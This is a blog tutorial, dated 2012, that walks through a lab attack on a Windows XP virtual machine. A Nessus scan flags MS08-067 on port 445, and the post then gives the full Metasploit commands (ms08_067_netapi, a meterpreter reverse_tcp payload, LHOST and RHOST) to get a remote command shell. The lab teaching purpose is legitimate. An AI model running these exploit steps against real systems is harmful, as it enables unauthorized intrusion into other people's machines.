Friday, January 27, 2012

How to Exploit Windows XP using Metasploit and Nessus

In this tutorial we use Windows XP in Virtual Machine. We assumed that we have known the IP target. Here the onnection between Windows XP as target and LInux...

Picture 1. IP Linux : 192.168.1.144

 Picture 2. IP Windows: 192.168.1.145

 Picture 3. Checking Windows Connection in LInux  

 Picture 4. Checking LInux Connection in Windows 

Now, we try to analyze the vulnerability of the target using Nesus. So, open Nessus, Click tab scan, click add.

Then write name of the case, type : Run Now, Policy : Internal Network Scan, Scan Target : (Fill this with IP target in this case is 192.168.1.145), then cluck Launch Scan.
     Picture 5. Adding Scan Target

You can see the list of Vulnerabiity. 

  Picture 6. Adding Scan Target

To make it more focus in exploiting, you can filter it by clicking "Show Filter". Then check "Exploits Exist"

Picture 7. Filters

Now we have less number of vulnerability, click it...

Picture 8. The list of port of filtering vulnerability

You will see picture 9.

Picture 9. The list of filtering vulnerability

We have two kind of vulnerabilities in port 445, choose the high severity one. You will see the detail information e.g. about description and solution of the vulnerability, See the header in the plugin name : MS08-067..., we will use this number for metasploit.

Picture 10. The list detail information about vulnerability

Now we will start to exploit the system..
Open the metasploit system in terminal and type "msfconsole" and wait untill it is Opened,,,  
Picture 11. The first view of metasploit

Use exploit based on the plugin name by typing msf > use exploit/windows/smb/ms08_067_netapi...
Picture 12

Because the vulnerability is in the port TCP (445), type 
set PAYLOAD windows/meterpreter/reverse_tcp
Then define the host 192.168.1.144 
set LHOST 192.168.1.144
and the target 192.168.1.145 
set RHOST 192.168.1.145
Execution exploit with command
exploit

 Picture 13
Enter the smd of the Windows system by typing 
execute -f cmd.exe -M -i
Now you enter in the Windows system and can run commad via command prompt. 
For example we run "dir" to see the list of the directory
Picture 14

Picture 15

Picture 16


Picture 17


1 komentar:

Post a Comment